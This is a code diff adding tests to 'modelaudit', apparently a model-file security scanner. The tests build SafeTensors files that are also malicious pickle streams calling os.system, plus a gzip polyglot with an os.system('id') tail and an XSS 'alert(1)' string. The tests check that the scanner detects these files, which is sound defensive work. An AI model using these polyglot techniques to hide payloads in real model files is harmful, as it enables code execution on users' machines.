+    _isolate_reusable_meta_path_finders(monkeypatch)
 
     report = PickleReport(
         source="sourceless-parent-package-marker.pkl",
@@ -6388,6 +6403,7 @@ def test_zipimport_archive_changes_invalidate_source_snapshot(
         archive.writestr("zip_pkg/__init__.py", "")
         archive.writestr("zip_pkg/helper.py", "def entrypoint():\n    return 1\n")
     monkeypatch.syspath_prepend(str(archive_path))
+    _isolate_reusable_meta_path_finders(monkeypatch)
 
     with shared_source_sensitive_caches():
         report_generation = _begin_shared_source_report()
@@ -6494,6 +6510,7 @@ def test_loaded_parent_package_path_controls_child_source_resolution(
     (runtime_package / "__init__.py").write_text("")
     (runtime_package / "child.py").write_text("import os\n\ndef entrypoint():\n    return os.system('id')\n")
     monkeypatch.syspath_prepend(str(safe_root))
+    _isolate_reusable_meta_path_finders(monkeypatch)
 
     loaded_package = ModuleType("loaded_parent_pkg")
     loaded_spec = ModuleSpec(
@@ -6630,6 +6647,7 @@ def test_matching_source_bytecode_remains_analyzable(
     module_path.write_text("def entrypoint():\n    return 1\n")
     py_compile.compile(str(module_path), doraise=True)
     monkeypatch.syspath_prepend(str(tmp_path))
+    _isolate_reusable_meta_path_finders(monkeypatch)
 
     report = PickleReport(
         source="matching-cached-bytecode.pkl",

--- a/packages/modelaudit-picklescan/tests/test_call_graph_safe_spec_resolution.py
+++ b/packages/modelaudit-picklescan/tests/test_call_graph_safe_spec_resolution.py
@@ -1518,6 +1518,7 @@ def test_unloaded_frozen_module_with_pristine_import_runtime_remains_safe(
             name
             for name in frozen_names
             if name not in call_graph._TRUSTED_LOADED_INTERPRETER_MODULES
+            and name not in sys.modules
             and call_graph._interpreter_module_origin_without_import_hooks(name) == "frozen"
         ),
         None,
@@ -1545,6 +1546,7 @@ def test_unloaded_frozen_module_with_mutated_importer_fails_closed(
             name
             for name in frozen_names
             if name not in call_graph._TRUSTED_LOADED_INTERPRETER_MODULES
+            and name not in sys.modules
             and call_graph._interpreter_module_origin_without_import_hooks(name) == "frozen"
         ),
         None,
@@ -1584,6 +1586,7 @@ def test_in_place_importer_closure_code_mutation_blocks_unloaded_frozen() -> Non
             name
             for name in frozen_names
             if name not in call_graph._TRUSTED_LOADED_INTERPRETER_MODULES
+            and name not in sys.modules
             and call_graph._interpreter_module_origin_without_import_hooks(name) == "frozen"
         ),
         None,

--- a/tests/test_core.py
+++ b/tests/test_core.py
@@ -224,6 +224,120 @@ def _build_protocolless_binary_benign_scalar_pickle() -> bytes:
     return b"\x8c\x02os\x94."
 
 
+def _write_pickle_safetensors_polyglot(path: Path, header_length: int) -> None:
+    """Write a valid SafeTensors file whose bytes are also a dangerous pickle."""
+    pickle_tail = b"\n0cos\nsystem\n(Vecho modelaudit-polyglot\ntR."
+    metadata = json.dumps(
+        {
+            "tensor": {
+                "dtype": "U8",
+                "shape": [len(pickle_tail)],
+                "data_offsets": [0, len(pickle_tail)],
+            }
+        },
+        separators=(",", ":"),
+    ).encode()
+    assert len(metadata) <= header_length
+    path.write_bytes(
+        struct.pack("<Q", header_length) + metadata + (b" " * (header_length - len(metadata))) + pickle_tail
+    )
+
+
+def _write_safetensors_pickle_tail(
+    path: Path,
+    header_length: int,
+    pickle_tail: bytes,
+    *,
+    custom_metadata: dict[str, str] | None = None,
+) -> None:
+    header: dict[str, Any] = {
+        "t": {
+            "dtype": "U8",
+            "shape": [len(pickle_tail)],
+            "data_offsets": [0, len(pickle_tail)],
+        }
+    }
+    if custom_metadata is not None:
+        header["__metadata__"] = custom_metadata
+    metadata = json.dumps(header, separators=(",", ":")).encode()
+    assert len(metadata) <= header_length
+    path.write_bytes(
+        struct.pack("<Q", header_length) + metadata + (b" " * (header_length - len(metadata))) + pickle_tail
+    )
+
+
+def _write_oversized_pickle_safetensors_polyglot(path: Path, opcode: bytes) -> None:
+    """Write a sparse oversized SafeTensors candidate with a skipped pickle operand."""
+    operand_length = file_detection.PROTO0_1_MAX_PROBE_BYTES + 4
+    operand = b"\x00\x00\x00{" + bytes(operand_length - 4)
+    pickle_stream = (
+        opcode + struct.pack("<I", operand_length) + operand + b"0" + _build_protocolless_binary_malicious_pickle()
+    )
+    header_length = struct.unpack("<Q", pickle_stream[:8])[0]
+    assert header_length > SAFETENSORS_ROUTING_HEADER_PARSE_BYTES
+    with path.open("wb") as handle:
+        handle.write(pickle_stream)
+        handle.truncate(8 + header_length)
+
+
+def _write_gzip_safetensors_polyglot(
+    path: Path,
+    *,
+    include_xss: bool = True,
+    include_python_payload: bool = True,
+    trailing_data: bytes = b"",
+) -> None:
+    """Write a valid SafeTensors file that is also a valid gzip Python payload."""
+    gzip_header = b'\x1f\x8b\x08\x00\x00\x00\x00\x00{"'
+    header_length = int.from_bytes(gzip_header[:8], "little")
+    block_length = 0xA2C2
+    blocks: list[bytes] = []
+    uncompressed = bytearray()
+    for block_index in range(13):
+        data = bytearray(b"a" * block_length)
+        if block_index == 0:
+            data[:3] = b"'''"
+        blocks.append(b"\x60" + struct.pack("<H", block_length) + struct.pack("<H", block_length ^ 0xFFFF) + data)
+        uncompressed.extend(data)
+
+    final_length = 20_000
+    gzip_member_size = len(gzip_header) + sum(len(block) for block in blocks) + 5 + final_length + 8
+    file_size = gzip_member_size + len(trailing_data)
+    header_end = 8 + header_length
+    tensor_data_size = file_size - header_end
+    tensor_data_size_bytes = str(tensor_data_size).encode()
+    custom_metadata = b',"__metadata__":{"note":"<script>alert(1)</script>"}' if include_xss else b""
+    closure = (
+        b'":{"dtype":"U8","shape":['
+        + tensor_data_size_bytes
+        + b'],"data_offsets":[0,'
+        + tensor_data_size_bytes
+        + b"]}"
+        + custom_metadata
+        + b"}"
+    )
+    final_data_start = len(gzip_header) + sum(len(block) for block in blocks) + 5
+    closure_start = header_end - len(closure)
+    closure_in_final = closure_start - final_data_start
+    boundary_in_final = header_end - final_data_start
+    assert 0 <= closure_in_final < boundary_in_final < final_length
+
+    final_data = bytearray(b"a" * final_length)
+    final_data[closure_in_final:boundary_in_final] = closure
+    python_tail = b"'''\nimport os\nos.system('id')\n" if include_python_payload else b"'''\n"
+    final_data[boundary_in_final : boundary_in_final + len(python_tail)] = python_tail
+    final_data[boundary_in_final + len(python_tail) :] = b" " * (final_length - boundary_in_final - len(python_tail))
+    blocks.append(b"\x61" + struct.pack("<H", final_length) + struct.pack("<H", final_length ^ 0xFFFF) + final_data)
+    uncompressed.extend(final_data)
+
+    gzip_member = gzip_header + b"".join(blocks)
+    gzip_member += struct.pack("<II", zlib.crc32(uncompressed), len(uncompressed) & 0xFFFFFFFF)
+    payload = gzip_member + trailing_data
+    assert json.loads(payload[8:header_end].decode("utf-8"))
+    assert gzip.decompress(gzip_member) == uncompressed
+    path.write_bytes(payload)
+
+
 def _require_tf_protos() -> None:
     if not _has_tf_protos():
         pytest.skip("TensorFlow protobuf stubs unavailable")
@@ -2573,6 +2687,961 @@ def test_scan_file_malformed_zip64_locator_offset_fails_closed_without_raising(t
     assert result.scanner_name == "zip"
     assert result.success is False
     assert any(check.name == "ZIP Central Directory Preflight" for check in result.checks)
+
+
+@pytest.mark.parametrize(
+    "header_length",
+    [ord("V"), 0x560280],
+    ids=["protocol-0", "protocol-2"],
+)
+def test_scan_file_routes_pickle_safetensors_polyglot_to_pickle(
+    tmp_path: Path,
+    header_length: int,
+) -> None:
+    polyglot = tmp_path / "payload.unknown"
+    _write_pickle_safetensors_polyglot(polyglot, header_length)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(
+        str(polyglot),
+        config={"scanners": ["pickle"], "cache_enabled": False},
+    )
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+def test_scan_file_routes_safetensors_pickle_operand_crossing_short_probe(tmp_path: Path) -> None:
+    pickle_tail = (b"A" * file_detection.PROTO0_1_MAX_PROBE_BYTES) + b"\n0cos\nsystem\n(Vtrue\ntR."
+    header_length = ord("V")
+    metadata = json.dumps(
+        {
+            "tensor": {
+                "dtype": "U8",
+                "shape": [len(pickle_tail)],
+                "data_offsets": [0, len(pickle_tail)],
+            }
+        },
+        separators=(",", ":"),
+    ).encode()
+    assert len(metadata) <= header_length
+    polyglot = tmp_path / "truncated-operand.unknown"
+    polyglot.write_bytes(
+        struct.pack("<Q", header_length) + metadata + (b" " * (header_length - len(metadata))) + pickle_tail
+    )
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+def test_scan_file_routes_security_pickle_in_complete_frame(tmp_path: Path) -> None:
+    pickle_body = b"cos\nsystem\n(Vtrue\ntR."
+    pickle_tail = b"\n0\x95" + struct.pack("<Q", len(pickle_body)) + pickle_body
+    polyglot = tmp_path / "framed-pickle.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+def test_scan_file_routes_frame_spanning_binbytes_safetensors_collision_to_pickle(tmp_path: Path) -> None:
+    # CPython joins the active frame remainder with the underlying stream for BINBYTES payloads.
+    frame_body = b"B" + struct.pack("<I", 4) + b"AB"
+    pickle_tail = (
+        b"\n0\x95"
+        + struct.pack("<Q", 2)
+        + b"\x95X"
+        + struct.pack("<Q", len(frame_body))
+        + frame_body
+        + b"CD0cos\nsystem\n(Vtrue\ntR."
+    )
+    polyglot = tmp_path / "frame-spanning-binbytes.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+@pytest.mark.parametrize(
+    "invalid_suffix",
+    [
+        b"\xff",
+        b"00N.",
+        b"\x80\x07N.",
+        b"\x95" + struct.pack("<Q", 1_000_000) + b"N.",
+    ],
+    ids=["unknown-opcode", "stack-underflow", "unsupported-protocol", "truncated-late-frame"],
+)
+def test_scan_file_keeps_reached_pickle_security_signal_after_late_error(
+    tmp_path: Path,
+    invalid_suffix: bytes,
+) -> None:
+    pickle_tail = b"\n0cos\nsystem\n(Vtrue\ntR" + invalid_suffix
+    polyglot = tmp_path / "late-error.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+def test_scan_file_routes_security_pickle_in_follow_on_stream(tmp_path: Path) -> None:
+    pickle_tail = b"\n0N." + b"cos\nsystem\n(Vtrue\ntR."
+    polyglot = tmp_path / "follow-on-stream.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+def test_scan_file_routes_follow_on_pickle_using_persistent_memo(tmp_path: Path) -> None:
+    first_stream = b"\n0\x8c\x02os\x94\x8c\x06system\x94N."
+    second_stream = b"h\x00h\x01\x93(X\x04\x00\x00\x00true\x85R."
+    polyglot = tmp_path / "persistent-memo.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), first_stream + second_stream)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    assert any(issue.rule_code in {"S201", "S205"} for issue in result.issues)
+
+
+def test_scan_file_routes_empty_module_stack_global_safetensors_collision_to_pickle(tmp_path: Path) -> None:
+    pickle_tail = b"\n0U\x00U\x06system\x93(Vtrue\ntR."
+    polyglot = tmp_path / "empty-module-stack-global.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    assert any(
+        issue.rule_code == "NON_ALLOWLISTED_GLOBAL"
+        and issue.details.get("invoked") is True
+        and issue.details.get("associated_global") == ".system"
+        for issue in result.issues
+    )
+
+
+def test_scan_file_keeps_empty_bytes_stack_global_safetensors_collision_clean(tmp_path: Path) -> None:
+    polyglot = tmp_path / "empty-bytes-stack-global.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), b"\n0C\x00\x8c\x02os\x93.")
+
+    assert file_detection.detect_file_format(str(polyglot)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "safetensors"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
+
+
+def test_scan_file_routes_security_pickle_after_early_frame_stop(tmp_path: Path) -> None:
+    framed_benign_stream = b"\x95" + struct.pack("<Q", 20) + b"N." + (b"\x00" * 18)
+    pickle_tail = b"\n0" + framed_benign_stream + b"cos\nsystem\n(Vtrue\ntR."
+    polyglot = tmp_path / "post-frame-stream.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+def test_scan_file_routes_security_pickle_after_valid_list_setitem(tmp_path: Path) -> None:
+    pickle_tail = b"\n0]NaK\x00Ns0cos\nsystem\n(Vtrue\ntR."
+    polyglot = tmp_path / "list-setitem.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+def test_scan_file_routes_security_pickle_after_memoized_list_mutation(tmp_path: Path) -> None:
+    pickle_tail = b"\n0]\x94Na0h\x00K\x00Ns0cos\nsystem\n(Vtrue\ntR."
+    polyglot = tmp_path / "memoized-list-mutation.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+def test_scan_file_routes_security_pickle_after_boolean_list_index(tmp_path: Path) -> None:
+    pickle_tail = b"\n0]Na\x89Ns0cos\nsystem\n(Vtrue\ntR."
+    polyglot = tmp_path / "boolean-list-index.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+@pytest.mark.parametrize(
+    "pickle_tail",
+    [b"\n0Ncos\nsystem\n.", b"\n0}q\x000Nq\x000cos\nsystem\n."],
+    ids=["residual-stack", "memo-overwrite"],
+)
+def test_scan_file_routes_cpython_valid_safetensors_pickle_overlap(
+    tmp_path: Path,
+    pickle_tail: bytes,
+) -> None:
+    header_length = ord("V")
+    metadata = json.dumps(
+        {
+            "tensor": {
+                "dtype": "U8",
+                "shape": [len(pickle_tail)],
+                "data_offsets": [0, len(pickle_tail)],
+            }
+        },
+        separators=(",", ":"),
+    ).encode()
+    polyglot = tmp_path / "cpython-valid-overlap.unknown"
+    polyglot.write_bytes(
+        struct.pack("<Q", header_length) + metadata + (b" " * (header_length - len(metadata))) + pickle_tail
+    )
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+def test_scan_file_routes_binpersid_safetensors_polyglot_to_pickle(tmp_path: Path) -> None:
+    prefix = b"\x88Q.\x00\x00\x00\x00\x00"
+    header_length = struct.unpack("<Q", prefix)[0]
+    polyglot = tmp_path / "persistent-id.unknown"
+    polyglot.write_bytes(prefix + b"{}" + (b" " * (header_length - 2)))
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(
+        str(polyglot),
+        config={"scanners": ["pickle"], "cache_enabled": False},
+    )
+
+    assert result.scanner_name == "pickle"
+    assert any(issue.rule_code == "S212" for issue in result.issues)
+
+
+@pytest.mark.parametrize(
+    "header_length",
+    [0x2E51, 0x2E52, 0x2E62, 0x2E81, 0x2E92, 0x2E93],
+    ids=["binpersid", "reduce", "build", "newobj", "newobj-ex", "stack-global"],
+)
+def test_scan_file_keeps_stack_invalid_pickle_shaped_safetensors_clean(
+    tmp_path: Path,
+    header_length: int,
+) -> None:
+    metadata = b'{"tensor":{"dtype":"U8","shape":[1],"data_offsets":[0,1]}}'
+    metadata += b" " * (header_length - len(metadata))
+    safetensors_path = tmp_path / "stack-invalid-pickle-shape.unknown"
+    safetensors_path.write_bytes(struct.pack("<Q", header_length) + metadata + b"\x00")
+
+    result = scan_file(str(safetensors_path), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
+
+
+def test_scan_file_keeps_large_aligned_safetensors_header_collision_clean(tmp_path: Path) -> None:
+    header_length = 80
+    data_length = file_detection.PROTO0_1_MAX_PROBE_BYTES + 4096
+    metadata = json.dumps(
+        {
+            "tensor": {
+                "dtype": "U8",
+                "shape": [data_length],
+                "data_offsets": [0, data_length],
+            }
+        },
+        separators=(",", ":"),
+    ).encode()
+    assert len(metadata) <= header_length
+    safetensors_path = tmp_path / "aligned-header.unknown"
+    safetensors_path.write_bytes(
+        struct.pack("<Q", header_length) + metadata + (b" " * (header_length - len(metadata))) + bytes(data_length)
+    )
+
+    assert file_detection.detect_file_format(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(safetensors_path)) == "safetensors"
+
+    result = scan_file(str(safetensors_path), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
+
+
+@pytest.mark.parametrize(
+    "pickle_body",
+    [b"cos\nsystem\n.", b"cos\nsystem\nN."],
+    ids=["balanced-stack", "residual-stack"],
+)
+def test_scan_file_keeps_truncated_frame_safetensors_collision_clean(
+    tmp_path: Path,
+    pickle_body: bytes,
+) -> None:
+    pickle_tail = b"\n0\x95" + struct.pack("<Q", 1_000_000) + pickle_body
+    header_length = ord("V")
+    metadata = json.dumps(
+        {
+            "tensor": {
+                "dtype": "U8",
+                "shape": [len(pickle_tail)],
+                "data_offsets": [0, len(pickle_tail)],
+            }
+        },
+        separators=(",", ":"),
+    ).encode()
+    safetensors_path = tmp_path / "truncated-frame.unknown"
+    safetensors_path.write_bytes(
+        struct.pack("<Q", header_length) + metadata + (b" " * (header_length - len(metadata))) + pickle_tail
+    )
+
+    assert file_detection.detect_file_format(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(safetensors_path)) == "safetensors"
+
+    result = scan_file(str(safetensors_path), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
+
+
+def test_scan_file_routes_executable_nested_frame_safetensors_collision_to_pickle(tmp_path: Path) -> None:
+    pickle_body = b"cos\nsystem\n."
+    pickle_tail = (
+        b"\n0\x95" + struct.pack("<Q", 20) + b"\x95" + struct.pack("<Q", len(pickle_body)) + pickle_body + bytes(32)
+    )
+    safetensors_path = tmp_path / "nested-frame.unknown"
+    _write_safetensors_pickle_tail(safetensors_path, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(safetensors_path)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(safetensors_path)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(safetensors_path)) == "pickle"
+
+    result = scan_file(str(safetensors_path), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+def test_scan_file_routes_large_safetensors_pickle_from_declared_frame_end(tmp_path: Path) -> None:
+    operand = b"x" * SAFETENSORS_ROUTING_HEADER_PARSE_BYTES
+    pickle_tail = (
+        b"\n0B"
+        + struct.pack("<I", len(operand))
+        + operand
+        + b"0\x95"
+        + struct.pack("<Q", 20)
+        + b"N."
+        + bytes(18)
+        + b"cos\nsystem\n."
+    )
+    polyglot = tmp_path / "large-frame-end.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    assert any(
+        issue.details.get("pickle_rule_code") == "DANGEROUS_GLOBAL"
+        and issue.details.get("associated_global") == "os.system"
+        for issue in result.issues
+    )
+
+
+def test_scan_file_keeps_failed_pickle_load_with_memo_safetensors_collision_clean(tmp_path: Path) -> None:
+    polyglot = tmp_path / "failed-load-with-memo.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), b"\n0]q\x00acos\nsystem\n.")
+
+    assert file_detection.detect_file_format(str(polyglot)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "safetensors"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
+
+
+def test_pickle_frame_alternates_share_one_work_budget() -> None:
+    block_end = 24
+    frame_fork_block = (
+        b"\x95"
+        + struct.pack("<Q", block_end - 9)
+        + b"N."
+        + b"\x95"
+        + struct.pack("<Q", block_end - (11 + 9))
+        + b"N.\xff\xff"
+    )
+    payload = (frame_fork_block * 20) + b"N."
+    budget = file_detection._PickleProbeWorkBudget()
+
+    state = file_detection._classify_initial_pickle_security_signal(
+        payload,
+        sample_is_prefix=False,
+        available_stream_length=len(payload),
+        _work_budget=budget,
+    )
+
+    assert state is None
+    assert budget.remaining_frame_branches == 0
+    assert budget.remaining_opcodes >= 0
+
+
+def test_pickle_tuple_hashability_is_cached_across_opcodes() -> None:
+    item_count = 4000
+    payload = b"}(" + (b"N" * item_count) + b"tq\x00Ns" + (b"h\x00Ns" * item_count) + b"."
+    budget = file_detection._PickleProbeWorkBudget()
+
+    state = file_detection._classify_initial_pickle_security_signal(
+        payload,
+        sample_is_prefix=False,
+        available_stream_length=len(payload),
+        _work_budget=budget,
+    )
+
+    assert state is False
+    assert len(budget.hashability_cache) == 1
+
+
+def test_scan_file_routes_hashable_tuple_alias_pickle_overlap(tmp_path: Path) -> None:
+    pickle_tail = b"\n0N" + (b"2\x86" * 25) + b"p0\n0(g0\nNd0cos\nsystem\n(Vtrue\ntR."
+    polyglot = tmp_path / "tuple-alias-pickle.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+@pytest.mark.parametrize("header_length", [ord("F"), ord("S")], ids=["invalid-float", "invalid-string"])
+def test_scan_file_keeps_invalid_long_line_operand_safetensors_collision_clean(
+    tmp_path: Path,
+    header_length: int,
+) -> None:
+    pickle_tail = (b"A" * file_detection.PROTO0_1_MAX_PROBE_BYTES) + b"\n0cos\nsystem\n(Vignored\ntR."
+    safetensors_path = tmp_path / "invalid-line-operand.unknown"
+    _write_safetensors_pickle_tail(safetensors_path, header_length, pickle_tail)
+
+    assert file_detection.detect_file_format(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(safetensors_path)) == "safetensors"
+
+    result = scan_file(str(safetensors_path), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
+
+
+def test_scan_file_keeps_semantically_invalid_pickle_prefix_safetensors_clean(tmp_path: Path) -> None:
+    pickle_tail = b"\n0\x96" + struct.pack("<Q", 1) + b"x" + b"M\x00\x01a0cos\nsystem\n(Vtrue\ntR."
+    safetensors_path = tmp_path / "invalid-bytearray-append.unknown"
+    _write_safetensors_pickle_tail(safetensors_path, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(safetensors_path)) == "safetensors"
+
+    result = scan_file(str(safetensors_path), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
+
+
+def test_scan_file_keeps_unhashable_pickle_dict_key_safetensors_clean(tmp_path: Path) -> None:
+    pickle_tail = b"\n0}]Ns0cos\nsystem\n(Vtrue\ntR."
+    safetensors_path = tmp_path / "unhashable-dict-key.unknown"
+    _write_safetensors_pickle_tail(safetensors_path, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(safetensors_path)) == "safetensors"
+
+    result = scan_file(str(safetensors_path), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
+
+
+@pytest.mark.parametrize(
+    "pickle_tail",
+    [b"\n0(2cos\nsystem\n(Vtrue\ntR.", b"\n0(\x85cos\nsystem\n(Vtrue\ntR."],
+    ids=["dup-mark", "tuple1-mark"],
+)
+def test_scan_file_keeps_unexpected_pickle_mark_safetensors_clean(
+    tmp_path: Path,
+    pickle_tail: bytes,
+) -> None:
+    safetensors_path = tmp_path / "unexpected-pickle-mark.unknown"
+    _write_safetensors_pickle_tail(safetensors_path, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(safetensors_path)) == "safetensors"
+
+    result = scan_file(str(safetensors_path), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
+
+
+@pytest.mark.parametrize(
+    "pickle_body",
+    [b"NNR.", b"NN\x93.", b"N)\x81.", b"N}b.", b"(No."],
+    ids=["reduce", "stack-global", "newobj", "build", "obj"],
+)
+def test_scan_file_keeps_known_type_invalid_pickle_safetensors_clean(
+    tmp_path: Path,
+    pickle_body: bytes,
+) -> None:
